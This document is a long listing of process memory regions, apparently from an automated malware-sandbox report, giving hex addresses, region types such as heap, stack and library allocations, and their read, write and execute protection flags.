|
page read and write
|
||
2126F500000
|
trusted library allocation
|
page read and write
|
||
29AACEF7000
|
trusted library allocation
|
page read and write
|
||
29AAD926000
|
trusted library allocation
|
page read and write
|
||
29AAEDED000
|
trusted library allocation
|
page read and write
|
||
29AAD124000
|
trusted library allocation
|
page read and write
|
||
29AAEE96000
|
trusted library allocation
|
page read and write
|
||
1DE82501000
|
heap
|
page read and write
|
||
29AAF0EE000
|
trusted library allocation
|
page read and write
|
||
29AADBD6000
|
trusted library allocation
|
page read and write
|
||
212C4E0D000
|
heap
|
page read and write
|
||
243FC71B000
|
heap
|
page read and write
|
||
29AAED15000
|
trusted library allocation
|
page read and write
|
||
1F55250F000
|
heap
|
page read and write
|
||
29AAF1AE000
|
trusted library allocation
|
page read and write
|
||
3F2B1FE000
|
stack
|
page read and write
|
||
29AAD074000
|
trusted library allocation
|
page read and write
|
||
29AAD014000
|
trusted library allocation
|
page read and write
|
||
29AAD1D4000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
1DE824D6000
|
heap
|
page read and write
|
||
29AADF68000
|
trusted library allocation
|
page read and write
|
||
29AAE7E7000
|
trusted library allocation
|
page read and write
|
||
29AACCFA000
|
trusted library allocation
|
page read and write
|
||
6002000
|
heap
|
page read and write
|
||
29AACB6D000
|
trusted library allocation
|
page read and write
|
||
29AAEDD5000
|
trusted library allocation
|
page read and write
|
||
29ABA124000
|
trusted library allocation
|
page read and write
|
||
243FE517000
|
heap
|
page read and write
|
||
29AADF18000
|
trusted library allocation
|
page read and write
|
||
243FC7E0000
|
heap
|
page read and write
|
||
790950E000
|
stack
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
212C4FD7000
|
heap
|
page execute and read and write
|
||
29AAD244000
|
trusted library allocation
|
page read and write
|
||
1DE82010000
|
heap
|
page read and write
|
||
29AAE188000
|
trusted library allocation
|
page read and write
|
||
29AADFAC000
|
trusted library allocation
|
page read and write
|
||
29AAC960000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
29AADAF6000
|
trusted library allocation
|
page read and write
|
||
29AACC9B000
|
trusted library allocation
|
page read and write
|
||
AB2000
|
trusted library allocation
|
page read and write
|
||
7DF4E48B0000
|
trusted library allocation
|
page execute and read and write
|
||
29AAEB47000
|
trusted library allocation
|
page read and write
|
||
29AAD566000
|
trusted library allocation
|
page read and write
|
||
66E0000
|
heap
|
page read and write
|
||
1DE80520000
|
heap
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
29AADB66000
|
trusted library allocation
|
page read and write
|
||
29AAD956000
|
trusted library allocation
|
page read and write
|
||
29AAEF46000
|
trusted library allocation
|
page read and write
|
||
29AAD996000
|
trusted library allocation
|
page read and write
|
||
54DE000
|
stack
|
page read and write
|
||
243FE882000
|
heap
|
page read and write
|
||
29AACEFC000
|
trusted library allocation
|
page read and write
|
||
29AAD426000
|
trusted library allocation
|
page read and write
|
||
1DE80555000
|
heap
|
page read and write
|
||
243FC726000
|
heap
|
page read and write
|
||
29AAC1D7000
|
trusted library allocation
|
page read and write
|
||
243FE52A000
|
heap
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
29AAF422000
|
trusted library allocation
|
page read and write
|
||
29AAD024000
|
trusted library allocation
|
page read and write
|
||
29AAECEE000
|
trusted library allocation
|
page read and write
|
||
29AA8210000
|
heap
|
page read and write
|
||
29AAE0A8000
|
trusted library allocation
|
page read and write
|
||
29AAF26B000
|
trusted library allocation
|
page read and write
|
||
29AAD104000
|
trusted library allocation
|
page read and write
|
||
BFD7BAE000
|
stack
|
page read and write
|
||
29AACC8B000
|
trusted library allocation
|
page read and write
|
||
1F552508000
|
heap
|
page read and write
|
||
246E000
|
stack
|
page read and write
|
||
29AAE638000
|
trusted library allocation
|
page read and write
|
||
29AADDD6000
|
trusted library allocation
|
page read and write
|
||
212AAE40000
|
heap
|
page read and write
|
||
1DE805EE000
|
heap
|
page read and write
|
||
29AAD2C5000
|
trusted library allocation
|
page read and write
|
||
3F2B4FE000
|
stack
|
page read and write
|
||
29AAD496000
|
trusted library allocation
|
page read and write
|
||
29AAE993000
|
trusted library allocation
|
page read and write
|
||
29AAEE6E000
|
trusted library allocation
|
page read and write
|
||
29AACE08000
|
trusted library allocation
|
page read and write
|
||
2630000
|
trusted library allocation
|
page read and write
|
||
29AAF0A6000
|
trusted library allocation
|
page read and write
|
||
212AD3FD000
|
trusted library allocation
|
page read and write
|
||
29AADFB8000
|
trusted library allocation
|
page read and write
|
||
29AA82A2000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
29AAE4C8000
|
trusted library allocation
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
243FE57D000
|
heap
|
page read and write
|
||
212AD24E000
|
trusted library allocation
|
page read and write
|
||
1F5524F4000
|
heap
|
page read and write
|
||
243FC78F000
|
heap
|
page read and write
|
||
212C4E8A000
|
heap
|
page read and write
|
||
2125D694000
|
heap
|
page read and write
|
||
1F552556000
|
heap
|
page read and write
|
||
243FE51A000
|
heap
|
page read and write
|
||
29AACD79000
|
trusted library allocation
|
page read and write
|
||
29AAE6E8000
|
trusted library allocation
|
page read and write
|
||
29AAEE5E000
|
trusted library allocation
|
page read and write
|
||
29AAF3D2000
|
trusted library allocation
|
page read and write
|
||
4DFB000
|
trusted library allocation
|
page read and write
|
||
29AAE6B8000
|
trusted library allocation
|
page read and write
|
||
1F552572000
|
heap
|
page read and write
|
||
29AAEE36000
|
trusted library allocation
|
page read and write
|
||
29AA9B20000
|
heap
|
page read and write
|
||
2ECEABF000
|
stack
|
page read and write
|
||
29AAE258000
|
trusted library allocation
|
page read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
1DE82477000
|
heap
|
page read and write
|
||
29AAE498000
|
trusted library allocation
|
page read and write
|
||
212AAD60000
|
heap
|
page read and write
|
||
2125D300000
|
heap
|
page read and write
|
||
29AAE318000
|
trusted library allocation
|
page read and write
|
||
29AAD936000
|
trusted library allocation
|
page read and write
|
||
29AAF3B6000
|
trusted library allocation
|
page read and write
|
||
29AAF3C2000
|
trusted library allocation
|
page read and write
|
||
29AAD214000
|
trusted library allocation
|
page read and write
|
||
258E000
|
stack
|
page read and write
|
||
243FE763000
|
heap
|
page read and write
|
||
29AADCF6000
|
trusted library allocation
|
page read and write
|
||
29AAD8D6000
|
trusted library allocation
|
page read and write
|
||
29AAD0C4000
|
trusted library allocation
|
page read and write
|
||
29AADC46000
|
trusted library allocation
|
page read and write
|
||
21277643000
|
heap
|
page read and write
|
||
29AAE518000
|
trusted library allocation
|
page read and write
|
||
29AAF18E000
|
trusted library allocation
|
page read and write
|
||
29AAE5F8000
|
trusted library allocation
|
page read and write
|
||
29AA9BF6000
|
heap
|
page read and write
|
||
29AADFCC000
|
trusted library allocation
|
page read and write
|
||
29AAD336000
|
trusted library allocation
|
page read and write
|
||
29AAD896000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
29AAED1D000
|
trusted library allocation
|
page read and write
|
||
212C50E4000
|
heap
|
page read and write
|
||
29AACCCB000
|
trusted library allocation
|
page read and write
|
||
1DE82470000
|
heap
|
page read and write
|
||
243FE7F8000
|
heap
|
page read and write
|
||
BFD7BEE000
|
stack
|
page read and write
|
||
212ACD4C000
|
trusted library allocation
|
page read and write
|
||
29AADCD6000
|
trusted library allocation
|
page read and write
|
||
29AAD084000
|
trusted library allocation
|
page read and write
|
||
29AAD7B6000
|
trusted library allocation
|
page read and write
|
||
A3D000
|
trusted library allocation
|
page execute and read and write
|
||
29AAF40A000
|
trusted library allocation
|
page read and write
|
||
1DE82454000
|
heap
|
page read and write
|
||
29AACF66000
|
trusted library allocation
|
page read and write
|
||
29AAEEA6000
|
trusted library allocation
|
page read and write
|
||
29AAE3F8000
|
trusted library allocation
|
page read and write
|
||
29AACE28000
|
trusted library allocation
|
page read and write
|
||
1F5524D1000
|
heap
|
page read and write
|
||
29AADBF6000
|
trusted library allocation
|
page read and write
|
||
29AAC403000
|
trusted library allocation
|
page read and write
|
||
212ACD7B000
|
trusted library allocation
|
page read and write
|
||
29AAE817000
|
trusted library allocation
|
page read and write
|
||
243FE762000
|
heap
|
page read and write
|
||
1F55075F000
|
heap
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
29AAF3B2000
|
trusted library allocation
|
page read and write
|
||
29AAE238000
|
trusted library allocation
|
page read and write
|
||
29AAF1D6000
|
trusted library allocation
|
page read and write
|
||
1DE82477000
|
heap
|
page read and write
|
||
29AAE648000
|
trusted library allocation
|
page read and write
|
||
243FE71D000
|
heap
|
page read and write
|
||
29AAD144000
|
trusted library allocation
|
page read and write
|
||
2125F3AE000
|
heap
|
page read and write
|
||
29AAD9B6000
|
trusted library allocation
|
page read and write
|
||
29AAEB2F000
|
trusted library allocation
|
page read and write
|
||
29AAEA5A000
|
trusted library allocation
|
page read and write
|
||
29AACF86000
|
trusted library allocation
|
page read and write
|
||
29AAF136000
|
trusted library allocation
|
page read and write
|
||
38F9000
|
trusted library allocation
|
page read and write
|
||
66DC000
|
stack
|
page read and write
|
||
1DE82477000
|
heap
|
page read and write
|
||
1DE805F9000
|
heap
|
page read and write
|
||
1DE805E9000
|
heap
|
page read and write
|
||
29AAE06F000
|
trusted library allocation
|
page read and write
|
||
29AAF7A2000
|
trusted library allocation
|
page read and write
|
||
29AAE888000
|
trusted library allocation
|
page read and write
|
||
5009000
|
stack
|
page read and write
|
||
46B35FE000
|
stack
|
page read and write
|
||
1DE8253F000
|
heap
|
page read and write
|
||
243FC7E0000
|
heap
|
page read and write
|
||
243FC7DE000
|
heap
|
page read and write
|
||
29AADB36000
|
trusted library allocation
|
page read and write
|
||
29AADEF8000
|
trusted library allocation
|
page read and write
|
||
1DE8053B000
|
heap
|
page read and write
|
||
212AD153000
|
trusted library allocation
|
page read and write
|
||
29AA9BA0000
|
trusted library allocation
|
page read and write
|
||
29AAD5F6000
|
trusted library allocation
|
page read and write
|
||
29AAE827000
|
trusted library allocation
|
page read and write
|
||
29AAE038000
|
trusted library allocation
|
page read and write
|
||
29AAC9EF000
|
trusted library allocation
|
page read and write
|
||
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
29AAE678000
|
trusted library allocation
|
page read and write
|
||
2ECE97E000
|
stack
|
page read and write
|
||
29AADD26000
|
trusted library allocation
|
page read and write
|
||
243FE867000
|
heap
|
page read and write
|
||
1DE824C6000
|
heap
|
page read and write
|
||
29AAED75000
|
trusted library allocation
|
page read and write
|
||
BFD82FC000
|
stack
|
page read and write
|
||
29AAE3D8000
|
trusted library allocation
|
page read and write
|
||
29AACE68000
|
trusted library allocation
|
page read and write
|
||
1DE82506000
|
heap
|
page read and write
|
||
243FE3FF000
|
heap
|
page read and write
|
||
29AAD456000
|
trusted library allocation
|
page read and write
|
||
29AAD5A6000
|
trusted library allocation
|
page read and write
|
||
5DBE000
|
stack
|
page read and write
|
||
29AACEC7000
|
trusted library allocation
|
page read and write
|
||
1F552546000
|
heap
|
page read and write
|
||
29AAEF16000
|
trusted library allocation
|
page read and write
|
||
29AAF42A000
|
trusted library allocation
|
page read and write
|
||
29AAEBF5000
|
trusted library allocation
|
page read and write
|
||
29AAEA89000
|
trusted library allocation
|
page read and write
|
||
29AADAE6000
|
trusted library allocation
|
page read and write
|
||
29AAD8B6000
|
trusted library allocation
|
page read and write
|
||
29AAEA42000
|
trusted library allocation
|
page read and write
|
||
2ECEA3E000
|
stack
|
page read and write
|
||
29AAEA99000
|
trusted library allocation
|
page read and write
|
||
29AACBFC000
|
trusted library allocation
|
page read and write
|
||
29AAECAD000
|
trusted library allocation
|
page read and write
|
||
4E1D000
|
trusted library allocation
|
page read and write
|
||
2125F3C0000
|
heap
|
page read and write
|
||
1F55257E000
|
heap
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
2620000
|
trusted library allocation
|
page read and write
|
||
29AADB06000
|
trusted library allocation
|
page read and write
|
||
243FE86E000
|
heap
|
page read and write
|
||
937000
|
stack
|
page read and write
|
||
29AAD766000
|
trusted library allocation
|
page read and write
|
||
1DE82651000
|
heap
|
page read and write
|
||
29AAE558000
|
trusted library allocation
|
page read and write
|
||
29AACA9E000
|
trusted library allocation
|
page read and write
|
||
29AAF176000
|
trusted library allocation
|
page read and write
|
||
2125D2F0000
|
heap
|
page read and write
|
||
2125F4F1000
|
trusted library allocation
|
page read and write
|
||
29AADFA8000
|
trusted library allocation
|
page read and write
|
||
1F552520000
|
heap
|
page read and write
|
||
212ACCE1000
|
trusted library allocation
|
page read and write
|
||
29AAE688000
|
trusted library allocation
|
page read and write
|
||
66F0000
|
trusted library allocation
|
page execute and read and write
|
||
243FE864000
|
heap
|
page read and write
|
||
29AAF0BE000
|
trusted library allocation
|
page read and write
|
||
212AB056000
|
heap
|
page read and write
|
||
29AAEF2E000
|
trusted library allocation
|
page read and write
|
||
29AAED6E000
|
trusted library allocation
|
page read and write
|
||
46B3BFF000
|
stack
|
page read and write
|
||
29AACF76000
|
trusted library allocation
|
page read and write
|
||
29AAF252000
|
trusted library allocation
|
page read and write
|
||
29AAF106000
|
trusted library allocation
|
page read and write
|
||
29AACDB9000
|
trusted library allocation
|
page read and write
|
||
29AAD164000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
29AAE088000
|
trusted library allocation
|
page read and write
|
||
BFD84FE000
|
stack
|
page read and write
|
||
29AACAAE000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
29AAD7A6000
|
trusted library allocation
|
page read and write
|
||
29AAD8F6000
|
trusted library allocation
|
page read and write
|
||
29AADD96000
|
trusted library allocation
|
page read and write
|
||
243FC73C000
|
heap
|
page read and write
|
||
5560000
|
trusted library allocation
|
page read and write
|
||
29AAF432000
|
trusted library allocation
|
page read and write
|
||
29AAEF76000
|
trusted library allocation
|
page read and write
|
||
29AAD346000
|
trusted library allocation
|
page read and write
|
||
1DE824DE000
|
heap
|
page read and write
|
||
790857E000
|
stack
|
page read and write
|
||
A27000
|
heap
|
page read and write
|
||
29AAF126000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
1DE82494000
|
heap
|
page read and write
|
||
2125F9EE000
|
trusted library allocation
|
page read and write
|
||
29AAD556000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
1F5526D0000
|
heap
|
page read and write
|
||
1DE82014000
|
heap
|
page read and write
|
||
243FE60E000
|
heap
|
page read and write
|
||
29AAEA52000
|
trusted library allocation
|
page read and write
|
||
790893E000
|
stack
|
page read and write
|
||
29AAE738000
|
trusted library allocation
|
page read and write
|
||
2125F4E0000
|
heap
|
page execute and read and write
|
||
8A7EFE000
|
stack
|
page read and write
|
||
29AADDB6000
|
trusted library allocation
|
page read and write
|
||
1F550742000
|
heap
|
page read and write
|
||
29AACAFD000
|
trusted library allocation
|
page read and write
|
||
29AAEC85000
|
trusted library allocation
|
page read and write
|
||
1DE82551000
|
heap
|
page read and write
|
||
29AAD946000
|
trusted library allocation
|
page read and write
|
||
29AACF36000
|
trusted library allocation
|
page read and write
|
||
2125D3BB000
|
heap
|
page read and write
|
||
29AADC06000
|
trusted library allocation
|
page read and write
|
||
29AAD3C6000
|
trusted library allocation
|
page read and write
|
||
29AAEC6D000
|
trusted library allocation
|
page read and write
|
||
212AB040000
|
heap
|
page read and write
|
||
29AAD576000
|
trusted library allocation
|
page read and write
|
||
29AAD406000
|
trusted library allocation
|
page read and write
|
||
29AACFB6000
|
trusted library allocation
|
page read and write
|
||
29AAD816000
|
trusted library allocation
|
page read and write
|
||
252C000
|
stack
|
page read and write
|
||
29AAE778000
|
trusted library allocation
|
page read and write
|
||
29AAA0B1000
|
trusted library allocation
|
page read and write
|
||
29AAD686000
|
trusted library allocation
|
page read and write
|
||
3F2B0FE000
|
stack
|
page read and write
|
||
1F55085E000
|
heap
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
29AAF406000
|
trusted library allocation
|
page read and write
|
||
29AAEF4E000
|
trusted library allocation
|
page read and write
|
||
29AAECF6000
|
trusted library allocation
|
page read and write
|
||
2660000
|
heap
|
page read and write
|
||
29AAEA2A000
|
trusted library allocation
|
page read and write
|
||
4E16000
|
trusted library allocation
|
page read and write
|
||
1DE82534000
|
heap
|
page read and write
|
||
212ACE48000
|
trusted library allocation
|
page read and write
|
||
29AAEF7E000
|
trusted library allocation
|
page read and write
|
||
29AAE914000
|
trusted library allocation
|
page read and write
|
||
29AAEE26000
|
trusted library allocation
|
page read and write
|
||
1F55075B000
|
heap
|
page read and write
|
||
29AAD506000
|
trusted library allocation
|
page read and write
|
||
29AADE16000
|
trusted library allocation
|
page read and write
|
||
BFD81F7000
|
stack
|
page read and write
|
||
1F55256A000
|
heap
|
page read and write
|
||
29AAF3C6000
|
trusted library allocation
|
page read and write
|
||
A8E000
|
stack
|
page read and write
|
||
212AB0B5000
|
heap
|
page read and write
|
||
2ECE67E000
|
stack
|
page read and write
|
||
243FE510000
|
heap
|
page read and write
|
||
29AADBE6000
|
trusted library allocation
|
page read and write
|
||
29AAD396000
|
trusted library allocation
|
page read and write
|
||
1DE82516000
|
heap
|
page read and write
|
||
29AADE06000
|
trusted library allocation
|
page read and write
|
||
29AACB9C000
|
trusted library allocation
|
page read and write
|
||
29AADFE8000
|
trusted library allocation
|
page read and write
|
||
29AACB0D000
|
trusted library allocation
|
page read and write
|
||
2ECECBE000
|
stack
|
page read and write
|
||
29AADF8C000
|
trusted library allocation
|
page read and write
|
||
29AACBEC000
|
trusted library allocation
|
page read and write
|
||
29AADBA6000
|
trusted library allocation
|
page read and write
|
||
29AAEEE6000
|
trusted library allocation
|
page read and write
|
||
1F5524F7000
|
heap
|
page read and write
|
||
29AAE7D8000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
29AAD5B6000
|
trusted library allocation
|
page read and write
|
||
243FC6F0000
|
heap
|
page read and write
|
||
1DE8247C000
|
heap
|
page read and write
|
||
29AAEB00000
|
trusted library allocation
|
page read and write
|
||
4E0E000
|
trusted library allocation
|
page read and write
|
||
29AAEAB9000
|
trusted library allocation
|
page read and write
|
||
29AAECCD000
|
trusted library allocation
|
page read and write
|
||
1DE8245F000
|
heap
|
page read and write
|
||
243FC5F0000
|
heap
|
page read and write
|
||
1DE8264D000
|
heap
|
page read and write
|
||
1F550760000
|
heap
|
page read and write
|
||
29AADA96000
|
trusted library allocation
|
page read and write
|
||
212AAFC0000
|
trusted library allocation
|
page read and write
|
||
2ECE3EE000
|
stack
|
page read and write
|
||
29AADC26000
|
trusted library allocation
|
page read and write
|
||
243FE863000
|
heap
|
page read and write
|
||
29AAD7C6000
|
trusted library allocation
|
page read and write
|
||
29AACC21000
|
trusted library allocation
|
page read and write
|
||
29AACF56000
|
trusted library allocation
|
page read and write
|
||
1DE805EB000
|
heap
|
page read and write
|
||
1DE82488000
|
heap
|
page read and write
|
||
1DE80540000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
29AAEEBE000
|
trusted library allocation
|
page read and write
|
||
29AACC6B000
|
trusted library allocation
|
page read and write
|
||
29AAF13E000
|
trusted library allocation
|
page read and write
|
||
29AAE768000
|
trusted library allocation
|
page read and write
|
||
46B34FE000
|
stack
|
page read and write
|
||
29AAE228000
|
trusted library allocation
|
page read and write
|
||
212AD0C8000
|
trusted library allocation
|
page read and write
|
||
212AAD9A000
|
heap
|
page read and write
|
||
29AAD676000
|
trusted library allocation
|
page read and write
|
||
515D000
|
stack
|
page read and write
|
||
1F5506CD000
|
heap
|
page read and write
|
||
29AAEAF0000
|
trusted library allocation
|
page read and write
|
||
29AAD5D6000
|
trusted library allocation
|
page read and write
|
||
29AAED0D000
|
trusted library allocation
|
page read and write
|
||
29AAECBD000
|
trusted library allocation
|
page read and write
|
||
29AACC41000
|
trusted library allocation
|
page read and write
|
||
29AAF1EE000
|
trusted library allocation
|
page read and write
|
||
29AAC1D4000
|
trusted library allocation
|
page read and write
|
||
4E40000
|
trusted library allocation
|
page read and write
|
||
29AACD69000
|
trusted library allocation
|
page read and write
|
||
29AAE4B8000
|
trusted library allocation
|
page read and write
|
||
29AAEA32000
|
trusted library allocation
|
page read and write
|
||
29AAD656000
|
trusted library allocation
|
page read and write
|
||
29AAE6A8000
|
trusted library allocation
|
page read and write
|
||
2125F974000
|
trusted library allocation
|
page read and write
|
||
1F5524DF000
|
heap
|
page read and write
|
||
29AAEB86000
|
trusted library allocation
|
page read and write
|
||
A93000
|
trusted library allocation
|
page read and write
|
||
29AAE868000
|
trusted library allocation
|
page read and write
|
||
29AACA0F000
|
trusted library allocation
|
page read and write
|
||
1F5506AB000
|
heap
|
page read and write
|
||
2125F510000
|
trusted library allocation
|
page read and write
|
||
212AB0B0000
|
heap
|
page read and write
|
||
29AAC9A0000
|
trusted library allocation
|
page read and write
|
||
243FC777000
|
heap
|
page read and write
|
||
243FE762000
|
heap
|
page read and write
|
||
29AAF52C000
|
trusted library allocation
|
page read and write
|
||
243FC79B000
|
heap
|
page read and write
|
||
29AAEC95000
|
trusted library allocation
|
page read and write
|
||
212ACD30000
|
trusted library allocation
|
page read and write
|
||
65DC000
|
stack
|
page read and write
|
||
29AADC56000
|
trusted library allocation
|
page read and write
|
||
29AAE398000
|
trusted library allocation
|
page read and write
|
||
212AD132000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
1DE805CD000
|
heap
|
page read and write
|
||
29AAE3B8000
|
trusted library allocation
|
page read and write
|
||
29AADA86000
|
trusted library allocation
|
page read and write
|
||
243FE863000
|
heap
|
page read and write
|
||
29AAD1E4000
|
trusted library allocation
|
page read and write
|
||
243FE3F5000
|
heap
|
page read and write
|
||
29AAF3EA000
|
trusted library allocation
|
page read and write
|
||
3F2B3FE000
|
stack
|
page read and write
|
||
1DE805F9000
|
heap
|
page read and write
|
||
29AAE4D8000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
29AAE0F8000
|
trusted library allocation
|
page read and write
|
||
29AAC9FF000
|
trusted library allocation
|
page read and write
|
||
1F5524D7000
|
heap
|
page read and write
|
||
29AAED4E000
|
trusted library allocation
|
page read and write
|
||
29AAED66000
|
trusted library allocation
|
page read and write
|
||
29AADCB6000
|
trusted library allocation
|
page read and write
|
||
29AAE98A000
|
trusted library allocation
|
page read and write
|
||
212C4DF0000
|
heap
|
page read and write
|
||
243FE863000
|
heap
|
page read and write
|
||
1F5524EB000
|
heap
|
page read and write
|
||
29AAD436000
|
trusted library allocation
|
page read and write
|
||
1DE805C2000
|
heap
|
page read and write
|
||
29AAECC5000
|
trusted library allocation
|
page read and write
|
||
243FC79B000
|
heap
|
page read and write
|
||
29AACC1C000
|
trusted library allocation
|
page read and write
|
||
ACB000
|
heap
|
page read and write
|
||
243FC756000
|
heap
|
page read and write
|
||
2125F490000
|
heap
|
page execute and read and write
|
||
1F5524E5000
|
heap
|
page read and write
|
||
29AACA7E000
|
trusted library allocation
|
page read and write
|
||
29AA9BF0000
|
heap
|
page read and write
|
||
BFD7E7E000
|
stack
|
page read and write
|
There are 1690 hidden memdumps, click here to show them.